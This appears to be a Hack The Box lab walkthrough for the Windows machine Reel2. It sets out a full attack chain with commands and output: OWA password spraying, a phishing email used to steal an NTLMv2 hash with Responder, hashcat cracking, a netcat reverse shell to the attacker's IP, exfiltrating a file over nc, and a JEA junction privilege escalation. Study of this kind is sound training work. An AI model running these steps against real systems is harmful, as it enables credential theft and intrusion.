Hack-The-Box-walkthrough[reel2]

introduce

OS: Windows
Difficulty: Hard
Points: 40
Release: 03 Oct 2020
IP: 10.10.10.210

User Blood xct 00 days, 03 hours, 08 mins, 20 seconds.
Root Blood xct 00 days, 07 hours, 06 mins, 12 seconds.

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~/hackthebox/machine/reel2# nmap -sV -v -p- --min-rate=10000 10.10.10.210
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
443/tcp open ssl/https?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
6008/tcp open msrpc Microsoft Windows RPC
6010/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6011/tcp open msrpc Microsoft Windows RPC
6012/tcp open msrpc Microsoft Windows RPC
6027/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • Port-80

Enumerating http But He Said 403-Forbidden

Enumerating HTTPS .

use gobuster to find Directories

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@kali:~/hackthebox/machine/reel2# gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.210
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/12 22:34:11 Starting gobuster
===============================================================
/public (Status: 302)
/exchange (Status: 302)
/Public (Status: 302)
/rpc (Status: 401)
/owa (Status: 301)

Go to /owa First

a login page. Try some sql injection

But nothing is work.

  • Port-8080

Create A Account On SignUp Page.

1
lucifer11/123456Wx

In Home Page There Are So Many Users

Gather All Users and Create A user.txt

1
2
3
sven
svensson
s.svensson

See All Posts In The Posts Tab, The svensson user post gave us a hint: This summer is so hot!

Create A pass.txt with this hint.

1
2
3
4
5
6
7
root@kali:~/hackthebox/machine/reel2# cat /usr/share/wordlists/rockyou.txt | grep Summer > pass.txt
root@kali:~/hackthebox/machine/reel2# cat pass.txt
Summer
Summer1
Summer07
Summer08
...

With the user.txt and pass.txt, lets bruteforce the OWA login

But We Don’t bruteforce OWA login with wfuzz and hydra. we need to install a tool called SprayingToolkit.

  • SprayingToolkit

Before Running this tool install the requirements of this tool.

Let’s run the tool

1
2
3
4
5
root@kali:~/SprayingToolkit# python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
[*] Starting spray at 2020-10-13 03:40:56 UTC
[-] Authentication failed: svensson:Summer2020 (Invalid credentials)
[-] Authentication failed: sven:Summer2020 (Invalid credentials)
[+] Found credentials: s.svensson:Summer2020 (Invalid credentials)
  • Username = s.svensson
  • Password = Summer2020

get shell

site is on another language. Let’s open it in chromium so we will understand what’s going on.

Now I understand what’s going on here it’s a mail server i think we need to do some Phising stuff.

If you don’t known about that here is an interesting article.

  • NetNTLMv2 hash stealing using Outlook

So what we can do now compiling a new message

1.click on New message.

2.Select all user with Control+A then click on To button on bottom. So this will send our email to each and every user .

3.Give the subject as you wish and in the body enter your htb ip like http://10.10.14.3

  • Important :

Before Sending this email start the responder.

1
responder -I tun0

Boom, After couple of minutes we get the response back.

But first we need to crack this hash using hashcat. we known this is NTLMv2 Hash

1
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
  • username = k.svensson

  • password = kittycat1

Evil-WinRm is not work at this situation because port 5985 is not open.

So we using Linux Powershell to login.But First Install powershell for Linux

1
2
apt install gss-ntlmssp
apt-get install powershell

After installation can access powershell with pwsh.

Now login with pwsh.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@kali:~# pwsh
PowerShell 7.0.0
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/powershell
Type 'help' to get help.

A new PowerShell stable release is available: v7.0.3
Upgrade now, or check out the release page at:
https://aka.ms/PowerShell-Release?tag=v7.0.3

PS /root> $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson

PowerShell credential request
Enter your credentials.
Password for user k.svensson: *********

PS /root> Enter-PSSession $offsec_session
[10.10.10.210]: P>

Now commands like dir, ls, cd, whoami won’t work.

$env:username and $env:domainname works.

1
2
[10.10.10.210]: P> $env:username
k.svensson

We need to Execute powershell commands with the script block

  • behavior of Out-Default
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[10.10.10.210]: P> &{ cd ../Desktop }
[10.10.10.210]: P> &{ ls }


Directory: C:\Users\k.svensson\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2020/7/30 13:19 2428 Sticky Notes.lnk
-ar--- 2020/10/13 9:17 34 user.txt


[10.10.10.210]: P> &{ type user.txt} 210ff91b4373ae60dbc352737555b4b4

get root

Now, let’s change this interface to shell interface for that we need to transfer a nc.exe file and get a reverse shell.

  1. open a simple http server.
1
2
3
root@kali:~/hackthebox/machine/reel2# ls
nc.exe pass.txt user.txt
root@kali:~/hackthebox/machine/reel2# python -m SimpleHTTPServer 80
  1. transfer nc.exe to the system
  • after running that open a netcat listener.
1
2
3
[10.10.10.210]: PS> &{ iwr -uri http://10.10.14.3/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
[10.10.10.210]: PS> &{ cd 'C:\Windows\System32\spool\drivers\color\'}
[10.10.10.210]: PS> &{ ./nc.exe 10.10.14.3 9001 -e powershell.exe}

and we get a reverse shell

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~# nc -lvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.210.
Ncat: Connection from 10.10.10.210:57417.
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\System32\spool\drivers\color> whoami
whoami
htb\k.svensson

We Found nothing in our Enumeration proccess Let’s check the log if anything interesting there.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PS C:\> dir
dir


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/30/2020 12:15 PM ExchangeSetupLogs
d----- 7/30/2020 12:02 PM inetpub
d----- 8/22/2013 5:52 PM PerfLogs
d-r--- 10/8/2020 3:29 PM Program Files
d----- 7/30/2020 11:48 AM Program Files (x86)
d-r--- 7/30/2020 1:17 PM Users
d----- 9/29/2020 6:09 PM Windows
d----- 7/28/2020 2:57 PM xampp

we find 000003.log file in our current user directory Let’s get on that.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> ls
ls


Directory: C:\Users\k.svensson\AppData\Roaming\stickynotes\Local
Storage\leveldb


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/8/2020 3:34 PM 2320 000003.log
-a---- 7/30/2020 1:19 PM 16 CURRENT
-a---- 7/30/2020 1:19 PM 0 LOCK
-a---- 10/13/2020 9:22 AM 0 LOG
-a---- 10/8/2020 3:34 PM 182 LOG.old
-a---- 7/30/2020 1:19 PM 41 MANIFEST-000001

when we use type command to see inside 000003.log file it’s give me gibberish.

So we need to get that file in our local machine.

So we use nc.exe to transfer the file.

  1. open a listener in your local machine to get the file content.
1
nc -nvlp 1234 > 000003.log
  1. In the window reverse shell type this command.
1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> cd /
cd /
PS C:\> cmd

cmd
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\>cd "C:\Windows\System32\spool\drivers\color\"
cd "C:\Windows\System32\spool\drivers\color\"

C:\Windows\System32\spool\drivers\color>nc.exe 10.10.14.3 1234 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"
nc.exe 10.10.14.3 1234 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"

Let’s check our netcat listener.

1
2
3
4
5
6
root@kali:~/hackthebox/machine/reel2# nc -nvlp 1234 > 000003.log
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.210.
Ncat: Connection from 10.10.10.210:51827.

use strings command to see content in 000003.log file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
root@kali:~/hackthebox/machine/reel2# strings 000003.log 
VERSION
META:app://.
_app://.
__storejs__test__Z
META:app://.
_app://.
{"first":"<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>","back":"rgb(255, 242, 171)","title":"rgb(255, 235, 129)","wid":"350","hei":"375","deleted":"no","closed":"yes","locked":"no"}
_app://.
__storejs__test__
_app://.
closed
{"closed":"yes"}
_app://.
{"ids":"1"}y
META:app://.
_app://.
__storejs__test__
_app://.
closed
@:lK
META:app://.
_app://.
closed
{"closed":"yes"}
META:app://.
_app://.
__storejs__test__
_app://.
closed
META:app://.
_app://.
closed
{"closed":"yes"}
META:app://.
_app://.
__storejs__test__
_app://.
closed
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__P
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__]
META:app://.
_app://.
closed
{"closed":"yes"}
META:app://.
_app://.
__storejs__test__
_app://.
closed:
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__b
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__N
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__

now We got the username and password

1
2
username = jea_test_account
password = Ab!Q@vcg^%@#1

Privilege escalation

Looking at the basic jae_test_account.psrc and .pssc the Check-File commad loads if the contents are from the “C:\ProgramData”.

So what we can do we need to create a Symlink to ProgramData directory with Administrator directory.

  • Important:

be sure run this command in PS

1
2
3
4
5
6
7
8
9
10
PS C:\> New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'


Directory: C:\ProgramData


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----l 10/13/2020 11:02 AM root

Now command will Executed successfully.

So when we login with jea_test_account account we can access Administrator directory also.

Now we need to login with jea_test_account account. So let’s open a new terminal and type pwsh.

  • Run the command one by one.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~# pwsh
PowerShell 7.0.0
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/powershell
Type 'help' to get help.

A new PowerShell stable release is available: v7.0.3
Upgrade now, or check out the release page at:
https://aka.ms/PowerShell-Release?tag=v7.0.3

PS /root> $username = "jea_test_account"
PS /root> $password = ConvertTo-SecureString "Ab!Q@vcg^%@#1" -AsPlainText -Force
PS /root> $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)
PS /root> Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate
[10.10.10.210]: PS>Check-File C:\programdata\root\Desktop\root.txt
18c458e91c1f45379bc97905034c8ad8

Summary of knowledge

  • bruteforce the OWA login using SprayingToolkit
  • NetNTLMv2 hash stealing using Outlook
  • responder to sniff NTLMv2 Hash
  • hashcat crack NTLMv2 Hash
  • login with pwsh
  • Execute powershell commands with the script block
  • iwr download files
  • nc.exe to transfer the file
  • create a Symlink to ProgramData directory with Administrator directory then use Check-File to read root flag.

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…